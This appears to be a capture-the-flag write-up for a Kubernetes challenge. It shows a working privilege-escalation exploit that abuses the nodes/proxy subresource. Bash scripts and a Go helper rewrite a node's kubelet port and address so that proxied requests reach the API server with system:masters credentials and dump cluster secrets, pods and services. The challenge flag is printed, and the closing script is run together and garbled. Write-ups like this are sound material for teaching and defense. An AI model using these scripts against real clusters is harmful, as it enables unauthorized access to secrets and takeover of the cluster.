- According to the advisory, when a proxy request is made to the kubelet service on a node, the API server’s own client certificate (which in a typical cluster is a user in the `system:masters` group) is used to authenticate the request. This effectively allows a user with get permissions against the `nodes/proxy` subresource to make GET requests to the kubelet API as `system:masters` (and equivalent for create, patch, etc.).

- Exploit (tl;dr): the script reads the node's status, rewrites the kubelet port (and node address) so that they point at the API server, patches the status, and then sends requests through the node proxy. Those requests now reach the API server itself, authenticated with the API server's own client certificate.

- We know that the current node is the master node, i.e. `noder` has the `master` and `control-plane` roles:

      #!/bin/bash
      set -euo pipefail

      readonly NODE=noder                # hostname of the worker node
      readonly API_SERVER_PORT=6443      # web port of API server
      readonly NODE_IP=172.30.0.2        # IP address of worker node
      readonly API_SERVER_IP=172.30.0.2  # IP address of API server
      readonly BEARER_TOKEN=$tkn         # bearer token to authenticate to API

      # Fetch the current node status
      curl -k -H "Authorization: Bearer ${BEARER_TOKEN}" -H 'Content-Type: application/json' \
        "https://${API_SERVER_IP}:${API_SERVER_PORT}/api/v1/nodes/${NODE}/status" >"${NODE}-orig.json"

      # Point the kubelet endpoint at the API server
      cat "${NODE}-orig.json" \
        | sed "s/\"Port\": 10250/\"Port\": ${API_SERVER_PORT}/g" \
        | sed "s/\"${NODE_IP}\"/\"${API_SERVER_IP}\"/g" \
        >"${NODE}-patched.json"

      # Patch the node status
      curl -k -H "Authorization: Bearer ${BEARER_TOKEN}" -H 'Content-Type:application/merge-patch+json' \
        -X PATCH -d "@${NODE}-patched.json" \
        "https://${API_SERVER_IP}:${API_SERVER_PORT}/api/v1/nodes/${NODE}/status"

      # Query the API server through the node proxy
      curl -k -H "Authorization: Bearer ${BEARER_TOKEN}" "https://${API_SERVER_IP}:${API_SERVER_PORT}/api/v1/nodes/${NODE}/proxy/api/v1/secrets"
      curl -k -H "Authorization: Bearer ${BEARER_TOKEN}" "https://${API_SERVER_IP}:${API_SERVER_PORT}/api/v1/nodes/${NODE}/proxy/api/v1/pods"
      curl -k -H "Authorization: Bearer ${BEARER_TOKEN}" "https://${API_SERVER_IP}:${API_SERVER_PORT}/api/v1/nodes/${NODE}/proxy/api/v1/services"
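The two `sed` substitutions in the script work on the raw JSON text. As an illustration of what they change, the sketch below makes the same edit structurally. It assumes the Node object's field layout `status.daemonEndpoints.kubeletEndpoint.Port` and `status.addresses[].address`. The function names `retargetKubelet` and `kubeletPort`, and the sample document in `main`, are hypothetical and not taken from the challenge.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// retargetKubelet rewrites the kubelet port and any address equal to nodeIP
// in a Node JSON document so that they point at the API server instead.
func retargetKubelet(nodeJSON []byte, nodeIP, apiServerIP string, apiServerPort int) ([]byte, error) {
	var node map[string]interface{}
	if err := json.Unmarshal(nodeJSON, &node); err != nil {
		return nil, err
	}
	status, ok := node["status"].(map[string]interface{})
	if !ok {
		return nil, fmt.Errorf("node document has no status object")
	}
	// status.daemonEndpoints.kubeletEndpoint.Port
	if de, ok := status["daemonEndpoints"].(map[string]interface{}); ok {
		if ke, ok := de["kubeletEndpoint"].(map[string]interface{}); ok {
			ke["Port"] = apiServerPort
		}
	}
	// status.addresses[].address
	if addrs, ok := status["addresses"].([]interface{}); ok {
		for _, a := range addrs {
			if m, ok := a.(map[string]interface{}); ok && m["address"] == nodeIP {
				m["address"] = apiServerIP
			}
		}
	}
	return json.Marshal(node)
}

// kubeletPort reads the kubelet port back out of a Node JSON document.
func kubeletPort(nodeJSON []byte) (int, error) {
	var node struct {
		Status struct {
			DaemonEndpoints struct {
				KubeletEndpoint struct {
					Port int `json:"Port"`
				} `json:"kubeletEndpoint"`
			} `json:"daemonEndpoints"`
		} `json:"status"`
	}
	if err := json.Unmarshal(nodeJSON, &node); err != nil {
		return 0, err
	}
	return node.Status.DaemonEndpoints.KubeletEndpoint.Port, nil
}

func main() {
	// Trimmed-down sample of a node status document, for illustration only.
	sample := []byte(`{"status":{"addresses":[{"type":"InternalIP","address":"172.30.0.2"}],"daemonEndpoints":{"kubeletEndpoint":{"Port":10250}}}}`)

	patched, err := retargetKubelet(sample, "172.30.0.2", "172.30.0.2", 6443)
	if err != nil {
		panic(err)
	}
	port, err := kubeletPort(patched)
	if err != nil {
		panic(err)
	}
	fmt.Println("kubelet port after patch:", port)
}
```

Once the patched status is applied, the API server believes the node's kubelet listens on the rewritten address and port, which is what makes the proxy requests loop back to the API server.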

-



The flag:

chmod +x exploit.sh ./exploit.sh > exploit.json cat exploit.json | grep -n flag

-



## Flag

WIZ_CTF{k8s_is_one_big_proxy}

Extra: #



- If in any case you are not able to find the kube-apiserver’s address

-

try pinging kuberenetes.default.svc , the ip address found is usually a local ip address for kube-apiserver.

-



Port

443is open, the port forwards all the request to port6443on thekube-apiserveron the master node.

-

In that case you can use the following code:

#!/bin/bash set -euo pipefail readonly NODE=noder # hostname of the worker node readonly API_SERVER_PORT=443 # web port of API server readonly API_SERVER_PRT=6443 readonly NODE_IP=172.30.0.2 # IP address of worker node readonly API_SERVER_IP=10.43.1.1 # IP address of API server readonly BEARER_TOKEN=$tkn # bearer token to authenticate to API server - other authentication methods could be used curl -k -H "Authorization: Bearer ${BEARER_TOKEN}" -H 'Content-Type: application/json' "https://${API_SERVER_IP}:${API_SERVER_PORT}/api/v1/nodes/${NODE}/status" > "${NODE}-orig.json" cat $NODE-orig.json | sed "s/\"Port\": 10250/\"Port\": ${API_SERVER_PRT}/g" > "${NODE}-patched.json" curl -k -H "Authorization: Bearer ${BEARER_TOKEN}" -H 'Content-Type:application/merge-patch+json' -X PATCH -d "@${NODE}-patched.json" "https://${API_SERVER_IP}:${API_SERVER_PORT}/api/v1/nodes/${NODE}/status" curl -k -H "Authorization: Bearer $BEARER_TOKEN" https://${API_SERVER_IP}:${API_SERVER_PORT}/api/v1/nodes/https:${NODE}:${API_SERVER_PRT}/proxy/api/v1/secrets/

-